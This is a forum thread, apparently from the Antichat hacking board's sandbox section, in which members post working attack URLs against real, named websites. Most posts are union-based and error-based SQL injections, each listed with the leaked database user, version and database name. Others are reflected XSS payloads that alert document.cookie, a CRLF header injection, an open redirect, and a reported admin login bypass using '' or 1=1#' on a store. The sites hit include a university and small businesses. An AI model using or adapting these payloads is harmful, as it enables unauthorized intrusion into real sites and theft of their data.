SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' (Песочница) started by Егорыч+++, 10 May 2015.

  1. SUHAR1K

    SUHAR1K Reservists Of Antichat

    Joined:
    12 May 2015
    Messages:
    70
    Likes Received:
    23
    Reputations:
    11
  2. Rosso

    Rosso New Member

    Joined:
    23 May 2015
    Messages:
    6
    Likes Received:
    3
    Reputations:
    5
    Code:
    http://www.hafen-fotos.de/keyphoto/viewphoto.php?foto=49200703071515.jpg&userhelp=on&helpid=-86 union select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3--+

    User: web310@localhost
    Version: 5.1.73
    Database: usr_web310_1
    PR: 3


    Code:
    http://www.innoworks.org/newinno/bios2.php?staff_id=-64 /*!50000union*/ select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3,4,5,6,7,8,9,10,11,12,13,14--+


    User: innowork_admin@localhost

    Version: 5.5.41-cll-lve
    Database: innowork_people
    PR: 5


    Code:
    http://www.arndt-sowi.de/webquest/show.php?id=-40' union select concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),2,3,4,5,6,7,8,9,10,11--+

    User: web33@localhost
    Version: 5.5.42
    Database: usr_web33_2
    PR: 3


    Code:
    http://www.solo-musica.de/show.php?id=-4' union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),5--+

    User: dbo354230028@195.20.225.33
    Version: 5.1.73-log
    Database: db354230028
    PR: 3


    Code:
    http://www.lernort-labor.de/events.show.php?ID=-153 union select 1,2,3,4,5,6,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

    User: lerjxdou@localhost
    Version: 4.1.26
    Database: usrdb_lerjxdou
    PR: 6


     
  3. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.leong-leong.com/news.php?id=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5
    5.1.72-REL14.10
    PR:4

    Code:
    https://www.naturesplus.com/sourceoflife/products/productDetail.php?id=999999.9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6
    5.1.70-log
    PR:4

    Code:
    http://pharm.buu.ac.th/News_view.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7+and+'0'='0

    5.0.45
    PR:4
     
  4. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    SQL-inj:
    Code:
    http://bezgazet.dp.ua/?act=mode&mode=0%22%20AND%20%28SELECT%204782%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707671%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x717a706a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22ClCs%22%3D%22ClCs
     
  5. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.alternativenergia.hu/wp-content/themes/alternativenergia/tudjmegtobbet.php?catid=85+or+1=9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8--
    PR - 5
    5.5.35-0+wheezy1-log
Output appears in the page source.
     
  6. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
Tasty treats :)
    Code:
    http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'='0
    5.5.41-0
    PR-5

Indians
    Code:
    http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7

    5.5.42-cll
    PR-3
    Code:
    http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12

    5.1.65
    Code:
    http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4

    5.0.96-log
    PR-3

    Code:
    http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    
    5.5.30

    PR-5
    Code:
    http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,version(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)

    5.5.30
    PR-4
    Code:
    http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
Jewelry store :)
    5.5.41-cll-lve
    PR-3
     
  7. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
On the jewelry store (http://www.exboyfriendjewelry.com/index.php), in the user login form, I entered:
user name: ' or 1=1#
password: ' or 1=1 '#
It logged in with the greeting: Welcome back ExboyfriendJewelry! Looks like the admin, but I'm not sure.
     
    nikonic likes this.
  8. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    SQL-inj (Blind):
    Code:
    http://rada.te.ua/poll.php?l=2%20AND%203*2*1%3d6%20AND%20913%3d913
     
    KIR@PRO and palec2006 like this.
  9. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://www.vsesdelki.lviv.ua/offer-i-id-i-409444-%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E-1-o-2-h-urovnevaja.html
    Code:
    http://www.admir.rv.ua/ru-i-classifieds-i-category-i-audio-video-foto-tehnika-i-what-i-1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E-i-where-i-%D0%A0%D0%BE%D0%B2%D0%BD%D0%BE-i-p.html
    Code:
    http://doski.ua/index.php/"><script>alert(document.cookie)</script>
     
    KIR@PRO likes this.
  10. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    74
    Reputations:
    22
    Code:
    http://www.lizzart.ru/catpg.php?k=1&t=2&id=-1689%20UNION%20ALL%20SELECT%20NULL%2CCURRENT_USER%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
    lizzart_mysql@10.1.55.253
     
  11. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&st=A
     
  12. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
     
    nikonic likes this.
  13. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69
     
    yarbabin likes this.
  14. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    XSS:
    Code:
    http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27anticat.ru%27%29%3C%2Fscript%3E&x=9&y=9
     
  15. BigBear

    BigBear Escrow Service
Staff Member Guarantor - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,789
    Likes Received:
    820
    Reputations:
    856
Guys, to teach beginner pentesters correct classification, it is DESIRABLE (if you want plus reputation) to state the full type of the vulnerability found: Blind SQL Injection, Reflected XSS, Arbitrary File Downloading and so on.

Thank you for your attention.

P.S. Mods, please pin this at the top of the thread.
     
  16. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
I'll try to pass for a newbie :)

    SQL-inj:
    Code:
    http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-

Output is at the bottom of the right column.

    ----

    Code:
    http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17--+-
     
    #116 EoGeneo, 5 Jul 2015
    Last edited: 5 Jul 2015
  17. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
Brown University is one of the most prestigious private universities in the USA, located in Providence, Rhode Island. It is the seventh-oldest national university and one of the nine colonial colleges.
    SQL Injection
    Code:
    http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)
    5.0.95-log
    PR - 8
TCI (Yandex citation index) - 800
Alexa: 9k
Traffic - 2.6M per month.
     
  18. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
CRLF-inj (the result appears in the response header).
    Code:
    http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
     
    joelblack and yarbabin like this.
  19. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    XSS:
    Code:
    http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
     
  20. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    224
    Likes Received:
    373
    Reputations:
    100
    target: clanwilliam.info
    type: SQL Injection
    current user: `clanwi_1@%`
    version: 5.5.43-0+DEB7U1-LOG
    Code:
    http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from+information_schema.tables+limit+0,1+--+;


    target:
    sergiev.ru
    type: Open Redirect
    Code:
    http://www.sergiev.ru/?q=http://ya.ru

     
    #120 joelblack, 6 Jul 2015
    Last edited: 8 Jul 2015
    Filipp likes this.